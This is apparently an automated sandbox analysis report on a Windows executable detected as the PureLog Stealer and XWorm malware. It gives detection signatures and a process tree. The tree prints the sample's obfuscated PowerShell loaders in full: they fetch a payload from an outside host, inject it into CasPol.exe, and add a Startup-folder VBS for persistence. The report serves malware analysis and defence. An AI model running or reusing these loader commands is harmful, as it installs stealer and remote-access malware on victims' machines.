Edit tour
Windows
Analysis Report
TM3utH2CsU.exe
Overview
General Information
Sample name: | TM3utH2CsU.exerenamed because original name is a hash value |
Original sample name: | 3658f44acb4d331fa89ab43d782bee2a97a48b2f425cad29939ee472c74bc62f.exe |
Analysis ID: | 1518119 |
MD5: | 2b39077634e7172489d66ed8e66ae63a |
SHA1: | 600467d0e3eadb245e451930dee698d1fc37ca23 |
SHA256: | 3658f44acb4d331fa89ab43d782bee2a97a48b2f425cad29939ee472c74bc62f |
Tags: | exeGuangdongKenuosiIoTNetworkTechnologyCoLtduser-JAMESWT_MHT |
Infos: | |
Detection
PureLog Stealer, XWorm
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Yara detected PureLog Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Drops VBS files to the startup folder
Drops script or batch files to the startup folder
Found suspicious ZIP file
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- TM3utH2CsU.exe (PID: 7740 cmdline:
"C:\Users\ user\Deskt op\TM3utH2 CsU.exe" MD5: 2B39077634E7172489D66ED8E66AE63A) - cmd.exe (PID: 7844 cmdline:
"cmd" /C s tart C:\Us ers\Public \Documents \privacy_p olicy.pdf MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7856 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Acrobat.exe (PID: 7920 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\Publ ic\Documen ts\privacy _policy.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 8084 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7392 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 00 --field -trial-han dle=1724,i ,133916880 6840932548 9,10583059 3560989879 35,131072 --disable- features=B ackForward Cache,Calc ulateNativ eWinOcclus ion,WinUse BrowserSpe llChecker /prefetch: 8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - cmd.exe (PID: 5072 cmdline:
cmd.exe /e :ON /v:OFF /d /c ""C :\Users\Pu blic\Docum ents\sys\p ure_hnvc.b at"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4920 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 5680 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \Documents \sys\hnvc. vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 1864 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6008 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3768 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 6392 cmdline:
cmd.exe /e :ON /v:OFF /d /c ""C :\Users\Pu blic\Docum ents\sys\p ure_hnvc.b at"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5024 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 5268 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \Documents \sys\hnvc. vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 4920 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2032 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6320 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 4928 cmdline:
cmd.exe /e :ON /v:OFF /d /c ""C :\Users\Pu blic\Docum ents\sys\p ure_hnvc.b at"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6676 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 4924 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \Documents \sys\hnvc. vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6600 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3644 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8200 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 8280 cmdline:
"cmd" /C e cho %usern ame% MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8292 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 8328 cmdline:
cmd.exe /e :ON /v:OFF /d /c ""C :\Users\Pu blic\Docum ents\pow\w m_startup. bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8336 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 8396 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \Documents \pow\wm.vb s" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 8468 cmdline:
"C:\Window s\System32 \cmd.exe" /c ping 12 7.0.0.1 -n 10 & powe rshell -co mmand [Sys tem.IO.Fil e]::Copy(' C:\Users\P ublic\Docu ments\pow\ wm.vbs', ' C:\Users\' + [Enviro nment]::Us erName + ' '\AppData\ Roaming\Mi crosoft\Wi ndows\Star t Menu\Pro grams\Star tup\ sbv.n avircse.vb s')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8476 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 8520 cmdline:
ping 127.0 .0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D) - powershell.exe (PID: 7204 cmdline:
powershell -command [System.IO .File]::Co py('C:\Use rs\Public\ Documents\ pow\wm.vbs ', 'C:\Use rs\' + [En vironment] ::UserName + ''\AppD ata\Roamin g\Microsof t\Windows\ Start Menu \Programs\ Startup\ s bv.navircs e.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 604 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnezB9dX JsID0gezF9 aHR0cHMnKy c6Ly9pYTYw JysnMDEwMC 51cy5hcmNo aScrJ3ZlLm 9yZycrJy8y NC9pJysndG VtcycrJy9k JysnZXQnKy dhJysnaC1u b3RlLXYvRG V0YWgnKydO b3RlVicrJy 50eHR7MX07 ezAnKyd9Ym FzZTY0Q28n KydudGVudC AnKyc9Jysn ICcrJyhOZX ctT2InKydq ZWN0IFN5Jy snc3QnKydl bS5OZScrJ3 QuVycrJ2Vi Q2xpZScrJ2 50KS4nKydE b3dubCcrJ2 9hZFN0Jysn cmluJysnZy h7MCcrJ30n Kyd1cmwpO3 snKycwfWJp bicrJ2FyJy sneUNvbicr J3RlbicrJ3 QgPScrJyAn KydbU3lzdG VtLkNvbnZl cnRdJysnOj onKydGcm9t QmEnKydzZT Y0U3RyaW5n KHswfWJhc2 UnKyc2NENv bicrJ3Rlbn QpO3swfWFz c2UnKydtYm wnKyd5ICcr Jz0nKycgW1 JlZmxlY3Rp b24uQXMnKy dzJysnZW1i bHldOjonKy dMbycrJ2Fk KHswfWJpbm EnKydyeUNv bnRlbnQpO3 swfXR5cCcr J2UgJysnPS B7JysnMH0n Kydhc3NlbS crJ2JseS5H ZXRUJysneX AnKydlKHsx fVInKyd1bl BFJysnLkhv JysnbWV7Jy snMX0pO3sw JysnfScrJ2 1lJysndGhv ZCA9IHswfX R5cGUuR2V0 TWV0aG9kKH sxfVZBJysn SXsxfScrJy k7ezB9Jysn bScrJ2UnKy d0aCcrJ29k LkluJysndi crJ29rZSh7 MH1udScrJ2 xsLCBbb2Jq ZScrJ2N0Wy crJ11dJysn QCh7MX0nKy cwJysnL2dK MWsnKydTJy snL2QvJysn ZWUuZScrJ3 RzYXAvLzpz cHR0aHsxJy snfScrJyAs JysnIHsxfW RlJysnc2F0 JysnaXZhZG 97MScrJ30n KycgLCB7MS crJ31kZXNh dGl2YScrJ2 QnKydvezF9 ICwgezF9Jy snZGUnKydz YXRpdmFkb3 snKycxfSx7 MX1DJysnYS crJ3NQbycr J2x7MX0nKy csezEnKyd9 eycrJzF9KS knKS1mICBb Y2hBUl0zNi xbY2hBUl0z OSkgfElleA ==';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1704 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1504 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('{0 }url = {1} https'+':/ /ia60'+'01 00.us.arch i'+'ve.org '+'/24/i'+ 'tems'+'/d '+'et'+'a' +'h-note-v /Detah'+'N oteV'+'.tx t{1};{0'+' }base64Co' +'ntent '+ '='+' '+'( New-Ob'+'j ect Sy'+'s t'+'em.Ne' +'t.W'+'eb Clie'+'nt) .'+'Downl' +'oadSt'+' rin'+'g({0 '+'}'+'url );{'+'0}bi n'+'ar'+'y Con'+'ten' +'t ='+' ' +'[System. Convert]'+ '::'+'From Ba'+'se64S tring({0}b ase'+'64Co n'+'tent); {0}asse'+' mbl'+'y '+ '='+' [Ref lection.As '+'s'+'emb ly]::'+'Lo '+'ad({0}b ina'+'ryCo ntent);{0} typ'+'e '+ '= {'+'0}' +'assem'+' bly.GetT'+ 'yp'+'e({1 }R'+'unPE' +'.Ho'+'me {'+'1});{0 '+'}'+'me' +'thod = { 0}type.Get Method({1} VA'+'I{1}' +');{0}'+' m'+'e'+'th '+'od.In'+ 'v'+'oke({ 0}nu'+'ll, [obje'+'c t['+']]'+' @({1}'+'0' +'/gJ1k'+' S'+'/d/'+' ee.e'+'tsa p//:sptth{ 1'+'}'+' , '+' {1}de' +'sat'+'iv ado{1'+'}' +' , {1'+' }desativa' +'d'+'o{1} , {1}'+'d e'+'sativa do{'+'1},{ 1}C'+'a'+' sPo'+'l{1} '+',{1'+'} {'+'1}))') -f [chAR]3 6,[chAR]39 ) |Iex" MD5: 04029E121A0CFA5991749937DD22A1D9) - CasPol.exe (PID: 3864 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Cas Pol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B) - CasPol.exe (PID: 8868 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Cas Pol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B) - cmd.exe (PID: 8544 cmdline:
cmd.exe /e :ON /v:OFF /d /c ""C :\Users\Pu blic\Docum ents\pow\w m_startup. bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8552 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 8612 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \Documents \pow\wm.vb s" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 8668 cmdline:
"C:\Window s\System32 \cmd.exe" /c ping 12 7.0.0.1 -n 10 & powe rshell -co mmand [Sys tem.IO.Fil e]::Copy(' C:\Users\P ublic\Docu ments\pow\ wm.vbs', ' C:\Users\' + [Enviro nment]::Us erName + ' '\AppData\ Roaming\Mi crosoft\Wi ndows\Star t Menu\Pro grams\Star tup\ sbv.n avircse.vb s')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8676 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 8712 cmdline:
ping 127.0 .0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D) - powershell.exe (PID: 9060 cmdline:
powershell -command [System.IO .File]::Co py('C:\Use rs\Public\ Documents\ pow\wm.vbs ', 'C:\Use rs\' + [En vironment] ::UserName + ''\AppD ata\Roamin g\Microsof t\Windows\ Start Menu \Programs\ Startup\ s bv.navircs e.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 4252 cmdline:
